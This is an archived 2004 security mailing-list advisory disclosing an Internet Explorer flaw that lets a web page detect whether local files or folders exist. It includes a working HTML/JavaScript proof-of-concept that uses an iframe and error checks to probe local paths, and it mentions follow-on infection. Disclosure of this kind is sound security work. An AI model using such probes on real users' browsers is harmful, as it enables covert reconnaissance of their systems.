Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Internet Explorer Local File/Directory Detection

from [Rynho Zeros Web] Network Security [Permanent Link]
Subject: Internet Explorer Local File/Directory Detection
Date: Tue, 24 Aug 2004 14:11:48 +0200 (MEST) 
Description:
============

This vulnerability, are based on the equal characteristics discovered by the
company GreyMagic Software of Israel in some of the versions of the
navigator Opera.

This bug also is available in the popular MS Internet Explorer, which could
be operated by a remote user to acquire sensible data of a remote system.
When a file or directory is assigned iframe that does not exist, this
navigator will generate an error. A remote user can create code HTML that
loads iframe and changes to the URL from this resource to a file or local
directory, and then detects if there is that error to determine if that
element exists.


Proof Of Concept (POC/Exploit):
===============================

-------------------------

<iframe src="http://www.lafrase.net";></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="C:/some_file_or_folder";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.\nHere could execute a script that infects
the computer with some virus, trojan, etc");
} catch (oErr) {
alert(sLocal+" Exists.\nThen do nothing");
}
},
250
);
}
</script>

-------------------------


Tested on:
==========

MS Internet Explorer 6.0.2800.1106 (SP1,Q867801) Win9x
MS Internet Explorer 5.0 Windows 2000

Also in Mozilla Firefox without success.


More Info:
==========

Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/


Disclaimer:
===========

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.

We are not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 


Version en
Español:
===================
http://www.rzw.com.ar/article1820-Internet-Explorer-deteccion-remota-de-directorio-o-archivo-local

-- 
Martin [XyborG] Aberastegue
http://www.rzw.com.ar
http://www.lafrase.net

NEU: Bis zu 10 GB Speicher für e-mails & Dateien!
1 GB bereits bei GMX FreeMail http://www.gmx.net/de/go/mail
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Internet Explorer Local File/Directory Detection, Rynho Zeros Web <=
Previous by Date:  RE: First vulnerabilities in the SP2 - XP ?..., Larry Seltzer
Next by Date:  [Full-Disclosure] [ GLSA 200408-23 ] kdelibs: Cross-domain cookie injection vulnerability, Joshua J. Berry
Previous by Thread:  [Full-Disclosure] Limited buffer overflow in Painkiller 1.31, Luigi Auriemma
Next by Thread:  [Full-Disclosure] [ GLSA 200408-23 ] kdelibs: Cross-domain cookie injection vulnerability, Joshua J. Berry
Indexes:  [Date] [Thread] [Top] [All Lists]